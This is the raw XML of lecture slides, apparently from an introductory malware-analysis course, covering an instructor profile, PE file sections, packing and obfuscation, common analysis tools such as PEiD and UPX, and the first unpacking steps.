          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Google Shape;98;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36512" y="3915054"/>
            <a:ext cx="3923928" cy="2942946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36237" y="1152281"/>
            <a:ext cx="4967811"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GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Hometown</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>: multiple towns</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Degree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">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GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ph.D (2014)</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GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Northumbria Unniversity, Newcatle Upon Tyne, UK.</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GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Major: Computer Networks and Communications.</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GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Thesis title: “An Mobility State Adaptive Routing Protocol for Mobile Ad Hoc Netwoks”. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="4638035"/>
            <a:ext cx="4752528"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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Research Interests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">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GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Mobile Ad Hoc and Sensor Networks, QoS Routing, Network Security, Visible Light Communications (VLC), Chaos theory.</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Institute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Korea – Vietnam Friendship IT College, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Vietnam – Korea University</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290282" y="755412"/>
            <a:ext cx="65845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dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://scholar.google.com.vn/citations?hl=en&amp;user=zC4vaRAAAAAJ</a:t>
            </a:r>
            <a:endParaRPr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0"/>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PE Headers and Sections</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p20"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="233" name="Google Shape;233;p20"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="557924" y="1200014"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{614F1EC8-023B-41F6-AEA7-A8C06D0698B5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1983950"/>
                <a:gridCol w="6134600"/>
              </a:tblGrid>
              <a:tr h="444250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>.text</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GB" sz="1800"/>
                        <a:t>Contains program code</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60175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>.rdata</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GB" sz="1800"/>
                        <a:t>Holds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> read-only</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> that is globally accessible within the program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>.</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4250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>.data</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GB" sz="1800"/>
                        <a:t>Stores</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> global data accessed throughout the program</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85975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>.idata</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GB" sz="1800"/>
                        <a:t>Sometimes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> presents and stores the import function information; if this section is not present, the import function information is stored in the .rdata section.</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85975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>.edata</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GB" sz="1800"/>
                        <a:t>Sometimes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> presents and stores the export function information; if this section is not present, the export function information is stored in the .rdata section.</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60175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>.pdata</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GB" sz="1800"/>
                        <a:t>Present only in 64-bit executables and stores exception-handling</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> information.</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4250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>.rsrc</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GB" sz="1800"/>
                        <a:t>Stores</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> resources needed by the executable</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4250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>.reloc</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GB" sz="1800"/>
                        <a:t>Contains information for relocation of library files</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1"/>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Packing and Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p21"/>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Malware writer often use packing and obfuscation to make their files more difficult to detect or analyse.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Obfuscated programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: malware writer has attempted to hide.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Packed programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: a subset of obfuscated programs in which the malicious program is compressed and unable to be analysed.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611561" y="5266074"/>
            <a:ext cx="8136904" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5DFEC">
              <a:alpha val="48627"/>
            </a:srgbClr>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i="1" lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Packed and obfuscated code will often include at least the functions LoadLibrary and GetProcAddress, which are used to load and gain access to additional functions.</a:t>
            </a:r>
            <a:endParaRPr sz="20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2"/>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Packing and Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p22"/>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Packing Files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="248" name="Google Shape;248;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1820551"/>
            <a:ext cx="7481478" cy="4200128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779912" y="2060848"/>
            <a:ext cx="1296144" cy="1859767"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="250" name="Google Shape;250;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3752010" y="5157192"/>
            <a:ext cx="1468062" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm"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23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3658358" y="1916832"/>
            <a:ext cx="5485642" cy="4143276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p23"/>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Packing and Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="4392488"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Once a program is packed, it must be unpacked  before performing an analysis.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Detecting packer: PEiD</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Packing/Unpacking: UPX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Examining header: PEview, Resource Hacker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="24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4"/>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Unpacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="264" name="Google Shape;264;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="464433" y="3104286"/>
            <a:ext cx="8215133" cy="1297126"/>
            <a:chOff x="7233" y="1907311"/>
            <a:chExt cx="8215133" cy="1297126"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="265" name="Google Shape;265;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7233" y="1907311"/>
              <a:ext cx="2161877" cy="1297126"/>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4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="45225" y="1945303"/>
              <a:ext cx="2085893" cy="1221142"/>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lang="en-GB" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Find OEP</a:t>
              </a:r>
              <a:endParaRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="267" name="Google Shape;267;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2385298" y="2287802"/>
              <a:ext cx="458317" cy="536145"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd fmla="val 60000" name="adj1"/>
                <a:gd fmla="val 50000" name="adj2"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B1C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txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2385298" y="2395031"/>
              <a:ext cx="320822" cy="321687"/>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2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="269" name="Google Shape;269;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3033861" y="1907311"/>
              <a:ext cx="2161877" cy="1297126"/>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txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3071853" y="1945303"/>
              <a:ext cx="2085893" cy="1221142"/>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lang="en-GB" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Dump</a:t>
              </a:r>
              <a:endParaRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="271" name="Google Shape;271;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5411926" y="2287802"/>
              <a:ext cx="458317" cy="536145"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd fmla="val 60000" name="adj1"/>
                <a:gd fmla="val 50000" name="adj2"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B1C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txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
